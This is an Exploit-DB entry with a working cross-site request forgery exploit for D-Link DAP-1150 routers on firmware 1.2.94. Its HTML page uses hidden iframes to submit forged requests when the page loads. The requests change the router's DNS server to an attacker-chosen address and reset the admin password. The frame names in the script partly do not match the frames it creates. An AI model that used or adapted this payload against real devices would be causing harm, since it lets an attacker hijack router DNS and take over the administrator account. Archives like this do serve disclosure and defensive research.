D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery

EDB-ID:

36767

CVE:

N/A

EDB Verified:

Author:

MustLive

Type:

remote

Exploit:   /  

Platform:

Hardware

Date:

2012-02-13

Vulnerable App: 
source: https://www.securityfocus.com/bid/51985/info

D-Link DAP-1150 is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.

D-Link DAP-1150 firmware version 1.2.94 is vulnerable; other versions may also be affected. 

<html>
<head>
<title>Exploit for D-Link DAP 1150. Made by MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="StartCSRF()">
<script>
function StartCSRF() {
for (var i=1;i<=3;i++) {
var ifr = document.createElement("iframe");
ifr.setAttribute(&#039;name&#039;, &#039;csrf&#039;+i);
ifr.setAttribute(&#039;width&#039;, &#039;0&#039;);
ifr.setAttribute(&#039;height&#039;, &#039;0&#039;);
document.body.appendChild(ifr);
}
CSRF1();
setTimeout(CSRF2,1000);
setTimeout(CSRF3,2000);
}
function CSRF1() {
window.frames["csrf3"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
type="hidden" name="res_json" value="y">\n<input type="hidden"
name="res_data_type" value="json">\n<input type="hidden"
name="res_config_action" value="3">\n<input type="hidden"
name="res_config_id" value="7">\n<input type="hidden" name="res_struct_size"
value="0">\n<input type="hidden" name="res_buf"
value="{%22manual%22:true,%20%22ifname%22:%22%22,%20%22servers%22:%2250.50.50.50%22,%20%22defroute%22:true}">\n</form>&#039;;
window.frames["csrf3"].document.hack.submit();
}
function CSRF2() {
window.frames["csrf4"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="res_cmd" value="20">\n<input type="hidden" name="res_buf"
value="null">\n<input type="hidden" name="res_cmd_type" value="bl">\n<input
type="hidden" name="v2" value="y">\n<input type="hidden" name="rq"
value="y">\n</form>&#039;;
window.frames["csrf4"].document.hack.submit();
}
function CSRF3() {
window.frames["csrf2"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
type="hidden" name="res_config_action" value="3">\n<input type="hidden"
name="res_config_id" value="69">\n<input type="hidden"
name="res_struct_size" value="1">\n<input type="hidden" name="res_buf"
value="password|">\n</form>&#039;;
window.frames["csrf2"].document.hack.submit();
}
</script>
</body>
</html>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services